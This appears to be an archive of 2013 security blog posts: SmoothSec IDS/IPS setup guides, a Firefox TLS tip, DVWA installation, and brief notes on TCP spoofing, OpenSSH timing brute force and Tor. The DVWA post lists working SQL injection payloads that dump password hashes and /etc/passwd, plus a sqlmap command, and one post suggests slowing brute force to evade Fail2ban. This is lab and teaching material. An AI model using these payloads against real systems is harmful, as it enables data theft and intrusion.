Monday, August 26, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Prevention System (IPS)

I am going to tell you how to build an affordable Intrusion Prevention System (IPS) for home, SOHO or small business use. With the default settings of Suricata, the performance of SmoothSec on the following hardware is not good enough for watching YouTube (360p). However, once tuned, it can handle YouTube up to 720p on the same hardware over a 10Mb internet connection. Yes, it still lags, but you can watch. Please also note that the connection is also behind a router (Untangle, with the same motherboard, CPU and RAM).

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta version no longer exists. Please get Version 3.2 from the official site; the beta and the official version are the same.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Card 0 and 1 will be bridged up while Network Card 2 will be a management interface.

Step 1 :

First of all, connect SmoothSec's Network Card 2 to the switch, while Network Cards 0 and 1 stay disconnected from the router. This is because you need an internet connection for the installation.

Step 2 (IDS Mode) :

Install SmoothSec as usual. When you are prompted to install non-free network interface firmware, just ignore it. After installation, the box will reboot.

Login as "root" with password "toor".

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

*or your network subnet.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone to "UTC" under "None of the above"; otherwise, Snorby will report wrong timestamps.

nano /var/www/snorby/config/snorby_config.yml

Under "production:", make sure "timezone_search: false" is set.

Make sure "time_zone: 'UTC'" is commented.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment out all existing eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asked for the monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once it has booted up, go to one of the personal computers and browse to "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6 (IPS Mode):

Make sure your box has been running in IDS mode for at least a day, then perform the following to switch it to IPS mode (inline mode). Otherwise, Snorby cannot capture the traffic.

Suricata

nano /etc/suricata/suricata.yaml

Locate "rule-files:" and append "- local.rules" under "- emerging.rules".

cd /etc/suricata/rules

touch local.rules

* you can add your own rules to "local.rules". After adding rules, you need to restart Suricata (see the restart command below).

Locate "nfq:" and uncomment all the items in that section except "# fail-open: yes", as it requires Linux kernel version 3.6 or greater.

/etc/init.d/suricata restart

* you need to wait several minutes before the box can connect to the internet.

PulledPork

nano /etc/pulledpork/suricata/dropsid.conf

Append the following :

pcre:MS(0[0-9]|1[0-9])-\d+,bugtraq:\d+,cve:20[0-9][0-9]-\d+

* this switches every rule whose text matches a Microsoft security bulletin (MSxx-xxx), a Bugtraq ID or a CVE reference to drop, i.e. all the vulnerabilities in vulnerability reports. Note the closing parenthesis after "1[0-9]"; without it the pcre is invalid.

IPtables

Add the following lines above "exit 0" at "/etc/rc.local" :

nano /etc/rc.local

iptables -A INPUT -i br0 -j NFQUEUE --queue-balance 0:3
iptables -A OUTPUT -o br0 -j NFQUEUE --queue-balance 0:3
iptables -A FORWARD -i br0 -o br0 -j NFQUEUE --queue-balance 0:3

* note that I have a quad-core CPU. If you have 8 cores, "--queue-balance" will be "0:7".

Suricata Startup Script

nano /etc/init.d/suricata

Locate "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -i $INTERFACES -D"

Replace with "/usr/local/bin/suricata --user suricata -c /etc/suricata/suricata.yaml -q0 -q1 -q2 -q3 -D"

Locate "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i $INTERFACES -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"

Replace with "/usr/local/bin/pigsty -c /etc/pigsty/suricata.pigsty.config.js -i br0 -n 'Suricata' -d /var/log/suricata/ -m unified2.alert.* -D"


* make sure you do it twice, as there are 2 entries in the file.
** if you have an 8-core CPU, it will be "-q0 -q1 -q2 -q3 -q4 -q5 -q6 -q7".

Then reboot your box. Please note that you are required to wait for several minutes before you can connect to the internet.
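The queue numbers in the iptables rules and on the Suricata start line have to agree, and the "fail-open" option depends on the kernel version; both are easy to get wrong when the lines above are copied onto a box with a different core count. The following is an added example, not part of SmoothSec, Suricata or this post: a small Python helper that derives the "--queue-balance" range and the "-q" flags from the core count, checks an rc.local line against a Suricata start line, and parses "uname -r" for the 3.6 requirement. The one-queue-per-core numbering (0 to N-1) is taken from the post; the function names are my own.

```python
"""Helper for the NFQUEUE part of the IPS setup (added example, not SmoothSec
or Suricata code): derive the iptables queue range and the Suricata -q flags
from the CPU core count, check that the two agree, and tell whether the
kernel is new enough for 'fail-open'."""
import os
import re

FAIL_OPEN_MIN_KERNEL = (3, 6)  # from the post: fail-open needs Linux >= 3.6


def queue_count(cores=None):
    """Number of NFQUEUE queues: one per CPU core (auto-detected if not given)."""
    n = cores if cores is not None else (os.cpu_count() or 1)
    if n < 1:
        raise ValueError("core count must be positive")
    return n


def queue_balance(cores=None):
    """Value for iptables --queue-balance, e.g. '0:3' on a quad-core box."""
    return f"0:{queue_count(cores) - 1}"


def iptables_rules(cores=None, bridge="br0"):
    """The three rc.local rules from the post, for the given core count."""
    bal = queue_balance(cores)
    return [
        f"iptables -A INPUT -i {bridge} -j NFQUEUE --queue-balance {bal}",
        f"iptables -A OUTPUT -o {bridge} -j NFQUEUE --queue-balance {bal}",
        f"iptables -A FORWARD -i {bridge} -o {bridge} -j NFQUEUE --queue-balance {bal}",
    ]


def suricata_queue_args(cores=None):
    """The -q flags for the Suricata start line, e.g. '-q0 -q1 -q2 -q3'."""
    return " ".join(f"-q{i}" for i in range(queue_count(cores)))


def queues_consistent(iptables_line, suricata_cmdline):
    """True when the iptables queue range and Suricata's -q list cover exactly
    the same queues. Packets balanced to a queue number that no process has
    bound are dropped by the kernel (unless --queue-bypass is used), so run
    this check after editing rc.local and /etc/init.d/suricata."""
    m = re.search(r"--queue-balance\s+(\d+):(\d+)", iptables_line)
    if not m:
        return False
    lo, hi = int(m.group(1)), int(m.group(2))
    wanted = set(range(lo, hi + 1))
    have = {int(q) for q in re.findall(r"(?:^|\s)-q\s*(\d+)", suricata_cmdline)}
    return wanted == have


def kernel_supports_fail_open(uname_r):
    """Parse a 'uname -r' string such as '3.2.0-4-amd64' and compare with 3.6."""
    m = re.match(r"(\d+)\.(\d+)", uname_r)
    if not m:
        raise ValueError(f"unrecognised kernel version: {uname_r!r}")
    return (int(m.group(1)), int(m.group(2))) >= FAIL_OPEN_MIN_KERNEL


if __name__ == "__main__":
    # Print the lines for this box, then the fail-open verdict for its kernel.
    for line in iptables_rules():
        print(line)
    print("suricata args:", suricata_queue_args())
    print("fail-open usable:", kernel_supports_fail_open(os.uname().release))
```

Run it on the SmoothSec box itself and paste the printed rules into rc.local and the printed flags into both Suricata entries in /etc/init.d/suricata; if `kernel_supports_fail_open` prints False, leave "fail-open" commented as the post says.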

Step 7:

To update SmoothSec, run the following commands (you can put them in a script). The rules are updated automatically every day in the early morning.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update


Step 8 (Suricata Tuning) :

nano /etc/suricata/suricata.yaml

Change "max-pending-packets:1024" to "max-pending-packets: 65000".

Locate "detect-engine" and change "- profile: medium" to "- profile: high".

Locate "mpm-algo: ac" and insert "detect-engine.sgh-mpm-context: full" above "mpm-algo: ac".

Then restart the Suricata. Please wait for several minutes before you can connect to the internet.

/etc/init.d/suricata restart

Known Issue

(1) You should remember that your box is in the UTC time zone.
(2) You may need to disable rule 1:2100527, which covers same-IP address scanning/connection, in "/etc/pulledpork/suricata/disablesid.conf". After that, make sure you restart Suricata.
(3) If you use a pattern matcher other than ac, such as b2g, b3g or wumanber, you will need more than 4GB of RAM.
(4) Using ac as the pattern matcher with 4GB of memory and an Intel Atom D510 CPU, you will encounter lagging while watching YouTube (720p) with about 20,000 active rules.
(5) If you have an nVidia display card (make sure you have installed the nVidia and CUDA drivers), you can compile Suricata with the flags "--enable-cuda --enable-nfqueue" and set "mpm-algo: b2g_cuda" in "/etc/suricata/suricata.yaml". Please note that you should have more than 4GB of memory. The other settings are similar or the same as above.

Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(this command is invalid for version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
Suricata Performance Tuning
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 22, 2013

HOWTO : SmoothSec 3.2 (beta) as Intrusion Detection System (IDS)

I am going to tell you how to build an affordable Intrusion Detection System (IDS) for home, SOHO or small business use. I will write another article later about building an Intrusion Prevention System (IPS).

Hardware

Motherboard - Intel Desktop Board D510MO
RAM - 4GB DDR2 (2 x 2GB)
Hard Drive - 320GB
Network Card 0 - Onboard Gigabit
Network Card 1 - TP-Link TG-3269 Gigabit PCI Network Adapter (with low profile)
Network Card 2 - D-Link DUB-E100 USB 2.0 Fast Ethernet Adapter (up to 200MB)

Software

Operating System - SmoothSec 3.2 beta (64-bit). The beta version no longer exists. Please get Version 3.2 from the official site; the beta and the official version are the same.

Setup

Internet -- Router -- SmoothSec -- Switch -- Personal Computers

Network Card 0 and 1 will be bridged up while Network Card 2 will be a management interface.

Step 1 :

First of all, connect SmoothSec's Network Card 2 to the switch, while Network Cards 0 and 1 stay disconnected from the router. This is because you need an internet connection for the installation.

Step 2 :

Install SmoothSec as usual. When you are prompted to install non-free network interface firmware, just ignore it. After installation, the box will reboot.

Login as "root" with password "toor".

Step 3 (Bug Fix):

Suricata

nano /etc/suricata/suricata.yaml

Locate "- fast:" and change "enabled: no" to "enabled: yes".

Locate "- drop:" and change "enabled: no" to "enabled: yes".

Locate "HOME_NET: '[192.168.1.0/24]'" and change to "HOME_NET: '[192.168.0.0/24]'".

*or your network subnet.

Time Zone for Snorby

If your time zone is not UTC, you should run the following command :

dpkg-reconfigure tzdata

Set the time zone to "UTC" under "None of the above"; otherwise, Snorby will report wrong timestamps.

nano /var/www/snorby/config/snorby_config.yml

Under "production:", make sure "timezone_search: false" is set.

Make sure "time_zone: 'UTC'" is commented.

Set your time zone at the Snorby web interface when it is available after Step 5.

Email feature of Snorby

apt-get install postfix libxrender-dev libfontconfig1

Configure the Postfix properly according to your network at "/etc/postfix/main.cf".

nano /var/www/snorby/config/initializers/mail_config.rb

Uncomment the lines just below "# Sendmail Example:".

Step 4 :

Connect Network Card 0 to router and Network Card 1 to Switch.

Normally, Network Card 0 will be eth0, Network Card 1 will be eth1 and Network Card 2 will be eth2.

nano /etc/network/interfaces

Comment out all existing eth2 entries.

Append the following :

auto eth2
iface eth2 inet static
   address 192.168.0.120
   netmask 255.255.255.0
   gateway 192.168.0.1


* where the "address" is your SmoothSec IP address and "gateway" is the IP address of your router.

nano /etc/init.d/bridge

Change "net1=eth1" to "net1=eth0"
Change "net2=eth2" to "net2=eth1"
Change "brctl addif $br eth1" to "brctl addif $br eth0"
Change "brctl addif $br eth2" to "brctl addif $br eth1"

update-rc.d bridge defaults

Step 5:

Run the script "smoothsec.first.setup" in the terminal.

Type "br0" when asked for the monitor network interface.

Select "Snort" or "Suricata" as IDS Engine. I choose "Suricata".

Then reboot.

Once it has booted up, go to one of the personal computers and browse to "https://192.168.0.120". Then set the time zone and your report email address accordingly.

Step 6:

To update SmoothSec, run the following commands (you can put them in a script). The rules are updated automatically every day in the early morning.

apt-get update
apt-get dist-upgrade
apt-get --purge autoclean
apt-get --purge autoremove
# update SmoothSec
cd /root/updates/
git pull origin master
# update Snorby
cd /var/www/snorby
git pull origin master
rake snorby:update
cd ~
# update pigsty
npm update -g pigsty
npm update -g pigsty-mysql
# update Suricata rules
smoothsec.suricata.rules.update

Known Issue

Nil.

You should remember that your box is in UTC time zone.

Debug the mailing feature

Do not run the following commands unless you really need to.

cd /var/www/snorby

bundle exec rails c production
Snorby::Jobs::SensorCacheJob.new(true).perform
Snorby::Jobs::DailyCacheJob.new(true).perform
(This command is invalid for Snorby version 2.6.2)

Reference

Snorby GitHub
Suricata
SmoothSec
Pigsty
SmoothSec WiKi - for installation

That's all! See you.

Thursday, August 15, 2013

Quick Blind TCP Connection Spoofing with SYN Cookies

Various Linux distributions, including Ubuntu and Debian, enable the TCP SYN cookies defence mechanism against SYN-flooding DoS attacks by default.

However, this defence mechanism may lead to an attack. Jakob Lell developed a PoC exploit and performed a test. He found that there was about one successful spoofed connection every 10 minutes, with a 3-year-old notebook (HP 6440b, i5-430M CPU and Marvell 88E8072 gigabit NIC) as the client and a desktop computer as the server. The test ran for 10.5 hours overnight and successfully spoofed 64 connections.

He also stated that if TCP SYN cookies are not enabled, the attack may still succeed, but it may need more time.

Consider what happens if an attacker spoofs an SSH connection without credentials.

Reference

[1] Full Disclosure
[2] Jakob Lell's Blog

That's all! See you.

Saturday, August 10, 2013

OpenSSH Time Brute Force

In 2006, there was a bug report about OpenSSH timing brute forcing. However, the OpenSSH developers stated that it is not a bug and that they would not fix it.

When an attacker tries to brute force an OpenSSH account, s/he issues a very long password (such as 39,000 characters in length). When the account name exists, the response is delayed much more than for a non-existing one.

TurboBorland developed a Proof-of-Concept (PoC) code for this purpose.

He stated that he could not test it successfully on a local network, but it works perfectly over the internet. However, I did not test it myself. If you are interested, you can try it.

If the target has Fail2ban implemented, you can try to delay the attack timing in order to avoid being blocked or banned.

That's all! See you.

Thursday, August 08, 2013

HOWTO : Enable TLS/1.1 on Firefox 23.0

Firefox 23.0 has been released. It supports TLS/1.1, but it is not enabled by default. Hiawatha WebServer developer Hugo Leisink suggests enabling it by setting the value of security.tls.version.max to 2.

Since the security.tls.version.min setting of Firefox 23.0 is 0, the connection falls back to a lower protocol version when the web server does not support TLS/1.1. So, it is safe to enable it.

How to enable it? Just key in "about:config" in the URL field of Firefox 23.0 and search for "security.tls.version.max". Then change the value from 1 to 2.

Meanwhile, Hiawatha WebServer already supports TLS/1.1, and it is one of the most lightweight and secure web servers by design.

That's all! See you.

Tuesday, August 06, 2013

Anonymity Network (Tor) has been compromised by NSA

Many hidden servers on the Tor network have disappeared since this Sunday. The founder of Freedom Hosting (which hosted a lot of hidden service servers) has been arrested and charged over managing some porn sites.

The article tells you something about that. This article believes that the Freedom Hosting server was compromised by the FBI with malicious JavaScript.

However, Cryptocloud found out that the JavaScript was planted by the National Security Agency (NSA).

It is true that the Tor network can be monitored by the NSA.

If you are using the Tor network, make sure you are using the latest versions of Firefox and the Tor software, and use NoScript (a Firefox add-on) to block JavaScript and Flash. Make sure you are not using an outdated Firefox such as the one in the Tor Browser Bundle.

Or, you can consider using my project, NightHawk, with the latest version of Firefox and NoScript.

That's all! See you.

Friday, August 02, 2013

HOWTO : DVWA SQL Injection

Security level = low

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'
- will display the users table column list

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory

99 or 1=1 union all select null,load_file('/etc/passwd')
- will display the content of /etc/passwd

Security level = medium

99 or 1=1
- will display all the records

99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message

99 or 1=1 union select 1,2
- no error message but display all records

99 or 1=1 union select null,null
- no error message but display all records

99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa

99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database

99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since where clause cannot be used, all column name should be listed

or

99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is Hex value of "users"

99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password

99 or 1=1 union select null,@@datadir
- will display the mysql directory
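To see why the payloads above work at "low", why escaping alone does not stop them at "medium", and what does stop them, here is an added example that is not part of DVWA or this post. It uses an in-memory SQLite stand-in for DVWA's MySQL "users" table (constructed sample rows with the same first_name and password columns the post queries; the hashes are MD5 as DVWA stores them) and builds the lookup behind "?id=" in three ways. Only "99 or 1=1" and a two-column "union select" are used, since MySQL-specific functions such as version() do not exist in SQLite; the function names are my own.

```python
"""Vulnerable, escaped-only and parameterized versions of DVWA's id lookup.
Added example, not DVWA code; the rows below are constructed sample data."""
import sqlite3

# Constructed sample rows in the shape of DVWA's users table (MD5 hashes).
SAMPLE_USERS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),  # md5('password')
    (2, "gordonb", "e99a18c4428cb38d5f260853678922e3"),
    (3, "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
]


def make_db():
    """Build the in-memory table; user_id is INTEGER so comparisons are typed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_low(conn, user_input):
    """DVWA 'low': the id is pasted straight into the SQL text. '99 or 1=1'
    rewrites the WHERE clause and 'union select' appends a second query."""
    sql = f"SELECT first_name, password FROM users WHERE user_id = {user_input}"
    return conn.execute(sql).fetchall()


def lookup_medium(conn, user_input):
    """DVWA 'medium': quotes are escaped (mysql_real_escape_string style) but
    the value is still unquoted in the SQL. Escaping only protects a string
    literal, so numeric payloads pass untouched; a payload containing quotes
    becomes a syntax error, which is why the post uses a hex literal there."""
    escaped = user_input.replace("'", "''")
    sql = f"SELECT first_name, password FROM users WHERE user_id = {escaped}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input):
    """The fix: a bound parameter is sent as a value and never parsed as SQL,
    so '99 or 1=1' is compared to user_id as a literal and matches nothing."""
    sql = "SELECT first_name, password FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def lookup_validated(conn, user_input):
    """Belt and braces: reject anything that is not an integer before it gets
    near the database, on top of binding the parameter."""
    user_id = int(user_input)  # raises ValueError for '99 or 1=1'
    sql = "SELECT first_name, password FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "99 or 1=1"
    print("low:          ", lookup_low(db, payload))            # every row
    print("medium:       ", lookup_medium(db, payload))         # still every row
    print("parameterized:", lookup_parameterized(db, payload))  # []
    try:
        lookup_validated(db, payload)
    except ValueError as err:
        print("validated:    ", err)
```

The lesson carried over to the PHP side is the same: cast the id to an integer (or use a prepared statement with a bound parameter) rather than escaping it, because escaping has no effect on a value that is not inside quotes.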

sqlmap for Security = low

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

For Security = medium is similar.

That's all! See you!

HOWTO : Install DVWA on Ubuntu Server 12.04 LTS

Step 1 :

Download DVWA.

wget https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip

Step 2 :

Install essential packages if you do not install LAMP when installing the Ubuntu Server.

sudo apt-get install apache2 mysql-server php5 unzip php5-mysql php-pear*

* make sure you remember the root password of MySQL, e.g. dvwapass

Step 3 :

Extract DVWA.

sudo cp v1.0.8.zip /var/www/
cd /var/www/
sudo unzip v1.0.8.zip
# the archive extracts to DVWA-1.0.8; the later steps expect /var/www/DVWA
sudo mv DVWA-1.0.8 DVWA


Step 4 :

sudo nano /var/www/DVWA/config/config.inc.php

Change the "db_password" to the captioned root password, e.g. dvwapass.

sudo nano /etc/apache2/conf.d/php.ini

change "allow_url_include = Off" to "allow_url_include = On".

sudo chmod -R 777 /var/www/DVWA/hackable/uploads/

Step 5 :

Create Database.

mysql -u root -p
create database dvwa;
quit


Step 6 :

Point your Firefox to "http://192.168.0.10/DVWA/setup.php" to create/reset database.

* where 192.168.0.10 is the IP address of the Ubuntu Server

Step 7 :

Then point your Firefox to "http://192.168.0.10/DVWA/index.php".

User name is "admin" and Password is "password".

That's all! See you.